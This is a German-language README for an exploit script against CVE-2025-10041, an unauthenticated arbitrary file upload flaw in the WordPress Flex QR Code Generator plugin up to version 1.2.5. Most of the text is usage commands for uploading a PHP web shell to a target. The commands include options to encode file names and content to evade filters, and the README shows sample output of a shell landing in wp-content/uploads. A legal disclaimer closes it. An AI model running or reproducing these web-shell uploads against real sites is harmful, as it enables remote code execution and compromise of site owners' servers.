
Flex QR Code Generator <= 1.2.5 - Nicht authentifizierter beliebiger Datei-Upload
Flex QR Code Generator <= 1.2.5 - Nicht authentifizierter beliebiger Datei-Upload
Das Flex QR Code Generator-Plugin für WordPress ist anfällig für beliebige Datei-Uploads aufgrund fehlender Dateityp-Prüfung in der Funktion save_qr_code_to_db() in allen Versionen bis einschließlich 1.2.5.
Dies ermöglicht nicht authentifizierten Angreifern, schädliche Dateien auf den Server der betroffenen Website hochzuladen, was potenziell zu Remote-Code-Ausführung führen kann.
CVE-2025-100419.8 (Kritisch)CVE-2025-10041.py ist ein professionelles Exploit-Tool, das entwickelt wurde, um den Angriff unter Ausnutzung dieser Schwachstelle zu automatisieren.
Es bietet erweiterte Funktionen zur Umgehung gängiger Schutzmechanismen und Kodierungstechniken.
python3 CVE-2025-10041.py -u http://target.com
python3 CVE-2025-10041.py -u http://target.com --encode_filename base64
python3 CVE-2025-10041.py -u http://target.com --encode_filename url
python3 CVE-2025-10041.py -u http://target.com --encode_content base64
python3 CVE-2025-10041.py -u http://target.com --shellname myevil.php
python3 CVE-2025-10041.py -u http://target.com --encode_content base64 --encode_filename base64 --shellname myevil.php
python3 CVE-2025-10041.py -u http://target.com --headers "X-Forwarded-For: 127.0.0.1" "Cookie: PHPSESSID=1337"
Um alle verfügbaren Optionen und Verwendungshinweise anzuzeigen:
python3 CVE-2025-10041.py --help
.php oder verdächtige Namen; Kodierung kann Filter umgehen.eval(base64_decode(...)) kann Inhaltsfilter umgehen.Checking vulnerability version...
Target is vulnerable ...
Exploiting ...
Uploading shell 'shell.php' ...
Shell uploaded successfully.
Shell path (guess): /wp-content/uploads/shell_3.php
Response: {...}
Dieses Skript wird nur für Bildungs-, Forschungs- und autorisierte Penetrationstest-Zwecke bereitgestellt.
Die unautorisierte Nutzung gegen Systeme, die du nicht besitzt oder für die du keine ausdrückliche Erlaubnis zum Testen hast, ist strengstens verboten und illegal.
Der Autor ist nicht verantwortlich für jeglichen Missbrauch oder Schaden, der durch dieses Tool verursacht wird.
Nxploited (Khaled Alenazi)